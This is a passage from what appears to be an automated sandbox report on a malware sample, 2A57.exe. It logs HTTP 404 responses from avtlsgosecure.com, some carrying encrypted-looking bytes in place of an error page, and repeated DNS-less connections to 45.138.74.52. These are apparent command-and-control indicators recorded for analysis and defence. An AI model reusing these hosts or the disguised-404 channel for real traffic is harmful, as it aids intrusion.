e4 00 c5 68 60 4a 30 1a 94 6b 3c 70 15 50 86 ac e2 b2 6c 59 c9 04 da 97 f7 61 7d 85 31 2d cb
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:01 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 405Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:01 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 405Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:02 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 405Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:03 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 405Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:03 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 405Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:05 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 405Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:08 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 55Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e fc 94 af bb a4 0f 42 bd de 2c fc e8 1c 36 90 fd 85 fc 20 b3 82 95 ae 7e ef 4c 8c a8 47 2e 8d 3d 54 96 4e Data Ascii: %S`Nh&WQY^B,6 ~LG.=TN
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:11 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 73Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ec 8a ac fd a3 18 07 bf df 26 ba ee 18 29 85 ef 94 f9 20 b0 8d 91 bb 22 ac 5a 91 b8 06 6e da 3c 43 8f 5c 29 bd c0 ce 1c cc fb 51 80 9d c4 f6 3e ba 45 33 e2 d3 Data Ascii: %S`Nh&WQY^&) "Zn<C\)Q>E3
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:13 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 47Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e e0 86 a2 fc be 1f 5b b5 c4 22 f0 e8 53 39 9e e7 c9 fe 20 b3 85 83 ac 23 a4 5b 9b Data Ascii: %S`Nh&WQY^["S9 #[
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:15 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 405Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:16 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 42Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e e0 86 a2 fc be 1f 5b b5 c4 22 f0 e8 53 39 9e e7 c9 a3 6f bb 98 95 Data Ascii: %S`Nh&WQY^["S9o
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:18 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 405Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:19 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 405Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:08:19 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 57Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb b8 4c 03 1d e2 81 b9 e5 bf 54 5d b3 c5 39 f9 b4 0d 33 92 f9 c9 f2 06 bb 82 88 b2 59 8b 0c b3 bf 04 7d c6 25 05 c0 4e 7e b5 Data Ascii: %S`Nh&WQLT]93Y}%N~
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.52
                  Source: 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: (Ycontent-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com 